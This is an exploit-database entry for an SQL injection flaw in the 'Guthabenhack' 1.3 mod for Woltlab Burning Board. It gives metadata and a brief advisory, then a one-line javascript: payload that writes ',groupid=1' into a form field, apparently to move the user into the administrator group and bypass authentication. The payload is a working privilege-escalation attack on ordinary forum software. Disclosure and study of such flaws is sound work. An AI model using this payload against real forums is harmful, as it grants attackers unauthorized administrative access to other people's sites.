[] NeoSense

MOD Guthabenhack 1.3 For Woltlab Burning Board - SQL Injection

Author: ben.moeckel@badwebmasters.net
type: webapps
platform: php
port: 
date_added: 2003-07-31 
date_updated: 2012-11-28 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/8321/info

MOD Guthabenhack For Woltlab Burning Board reported prone to an SQL injection vulnerability.

It has been reported that MOD Guthabenhack fails to sufficiently sanitize user input. It has been reported that this may allow the attacker to bypass authentication methods via SQL injection attacks.

javascript:x=document.forms[0].geworbenv;x.value=",
groupid=1";alert(x.value);